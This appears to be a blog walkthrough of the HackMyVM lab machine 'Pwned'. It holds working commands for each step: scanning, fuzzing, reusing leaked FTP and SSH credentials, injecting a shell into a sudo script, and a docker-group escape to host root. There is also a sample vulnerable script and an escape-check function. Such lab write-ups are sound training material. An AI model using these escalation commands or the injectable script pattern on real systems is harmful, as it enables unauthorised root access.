Writeup of Pwned HackMyVM – Walkthrough

I am currently doing both old and new machines from HackMyVM. Pwned is the second machine on the HackMyVM platform. In this post, I will try to explain everything in detail. This machine runs on VirtualBox.

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Pwned

Identify the target

Firstly, I had to identify the IP address of the target. This is the first step for every local VM: netdiscover ARP-scans the lab subnet and lists the hosts that answer.

sudo netdiscover -r 10.0.0.0/24
The IP address of the target is 10.0.0.18

Scan open ports

Next, I scanned the open ports to get the information on the exposed services on the network.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.18

Nmap scan results

From the nmap scan results, we know that the Linux distro is Debian, and that FTP, SSH and HTTP are exposed. The ftp-anon script did not list any files, which means anonymous login to the FTP server is most likely disabled. Therefore, my next step was the HTTP server.

Enumerate the HTTP server

The default page and its source weren’t much help. Therefore, I decided to brute-force directory and file names, adding the .php, .html and .txt extensions to each word.

ffuf -c -ic -r -u http://10.0.0.18/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -of html -o dir.html

ffuf scan results

There is a path /nothing that, true to its name, has nothing in it. However, the path /hidden_text serves a wordlist.

Wordlist of paths

This is a wordlist of paths, so I used it for another round of fuzzing. The entries in secret.dic already start with a slash, which is why there is no slash between the host and FUZZ in the command below; if your copy of the list has no leading slashes, use http://10.0.0.18/FUZZ instead.

ffuf -c -ic -r -u http://10.0.0.18FUZZ -w secret.dic -of html -o dir-secret.html 

/pwned.vuln is a path in the target
Login form in /pwned.vuln

We see a login form on the target. More usefully, an HTML comment in the page source gives us the username and password of the FTP user.

The source of the page contains the username and the password of the FTP server
lftp -u ftpuser 10.0.0.18
The FTP server

There is a directory that contains a note and what looks like an SSH private key. I downloaded both files to my local machine.

Then, I checked the note.txt file.

Note.txt content

From the note, I got “ariana” as a possible username. Then, using the private key, I logged in over SSH as that user. The key file must be readable only by its owner, otherwise ssh refuses to use it.

chmod 600 id_rsa
ssh ariana@10.0.0.18 -i id_rsa
SSH shell of ariana

User privilege escalation

Next, I checked the sudo permissions of the user ariana.

sudo -l
Sudo permissions of ariana

There is a script that ariana can execute as the user selena via sudo. Let’s look at the content of the script, if we are allowed to read it.

cat /home/messenger.sh
Content of messenger.sh

The script reads a message from the user and then expands that input, unquoted, on a command line, with errors redirected to /dev/null. In other words, whatever I enter as the message is executed as selena. Hence, entering “bash” as the message gives me a bash shell as selena. After that, I could upgrade it to a proper tty shell with python.

sudo -u selena /home/messenger.sh
Got the shell of selena
python3 -c 'import pty;pty.spawn("/bin/bash")'
The proper shell of selena
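The script itself is only shown as a screenshot above, so here is an added, hypothetical reconstruction of the pattern it uses (not the VM's real messenger.sh) next to a hardened version. The vulnerable function expands the message unquoted as a command, which is exactly why a message of "bash" yields a shell; the hardened one treats the message as data only. The function names, the output file argument and the sample messages are my assumptions for the example.

```bash
#!/usr/bin/env bash
# Added example: hypothetical reconstruction of the messenger.sh bug described
# in the walkthrough, not the VM's own script.

# Vulnerable pattern: the "message" is expanded unquoted on a command line and
# therefore executed as the script's user (selena, when run through sudo).
# 2>/dev/null hides the errors, so typos are silent and a real command runs.
vuln_send() {
    msg="$1"
    $msg 2>/dev/null
}

# Hardened pattern: the message is only ever data. printf '%s' does not
# interpret its argument, and the text is appended to a fixed file rather
# than passed to a shell.
safe_send() {
    msg="$1"
    outfile="$2"
    printf '%s\n' "$msg" >> "$outfile"
}

# Demonstration: the same "message" is executed by one version and merely
# stored by the other.
demo() {
    tmp=$(mktemp)
    echo "vulnerable: $(vuln_send 'id -un')"   # prints the current username
    safe_send 'id -un' "$tmp"
    echo "hardened:   $(cat "$tmp")"            # prints the literal text
    rm -f "$tmp"
}
```

Source the file and call demo to see the difference; run under sudo -u selena the vulnerable version would print selena, which is the whole escalation in one line.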

We can see above, in the output of id, that selena belongs to the docker group. Members of that group can talk to the Docker daemon, which runs as root, so this is a straightforward path to root on the host.

Reference: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#docker-group

docker image list
docker run -it --rm -v /:/mnt alpine chroot /mnt bash
In the root shell of the container

I listed the images first because docker run would try to pull alpine if it were not already present locally, and the VM has no reason to have internet access. The command then starts an interactive bash on the alpine image, with the host’s root file system bind-mounted at /mnt inside the container, and runs chroot /mnt before bash so that the container’s root directory becomes the host’s root directory. Because the container process runs as root and there is no user namespace, that root is root on the host’s files: anything created or changed under /mnt is created or changed on the host. The hostname in the prompt is the container ID (“12cccac77f6c”) rather than “pwned”, which is expected, but the directory tree we see is the host’s, and we can read the root flag or make persistent changes to the host from here. If you remove “chroot /mnt” from the command, you will get the container’s own file system instead, and the host’s file system will be visible under /mnt.
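As an added post-exploitation check that is not part of the original walkthrough, the following shell functions test for the docker-group escalation path without touching Docker. They take the output of id as a string (so the check runs offline) and test the socket path separately, because what actually grants root is write access to the Docker socket; group membership is just the usual way to get it. The function names and the default socket path /var/run/docker.sock are my assumptions for the example.

```bash
#!/usr/bin/env bash
# Added example: enumerate the docker-group / docker-socket escalation path.
# Not code from the walkthrough. Usage on a target:
#   docker_escape_check "$(id)" /var/run/docker.sock

# Returns 0 when the id(1) output lists the docker group, e.g.
# "uid=1001(selena) gid=1001(selena) groups=1001(selena),999(docker)".
in_docker_group() {
    printf '%s\n' "$1" | grep -Eq '(^|[,= ])[0-9]+\(docker\)'
}

# Returns 0 when the socket exists and is writable by the current user.
# This is the condition that really matters: a writable socket means full
# control of the root-owned daemon, whatever groups the user is in.
docker_socket_writable() {
    [ -S "$1" ] && [ -w "$1" ]
}

# Prints the escape command when the path is open, otherwise a short reason.
docker_escape_check() {
    idline="$1"
    sock="${2:-/var/run/docker.sock}"
    if in_docker_group "$idline" || docker_socket_writable "$sock"; then
        echo "docker reachable: root on the host via"
        echo "  docker run -it --rm -v /:/mnt alpine chroot /mnt bash"
        echo "(needs an image present locally; check 'docker image list' first)"
        return 0
    fi
    echo "no docker group membership and $sock is not writable"
    return 1
}
```

On the defensive side the same two facts are what to audit: nobody who is not a full administrator should be in the docker group, and the socket should not be group- or world-writable; rootless Docker removes the path entirely.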

Check my walkthrough of Driftingblues 7
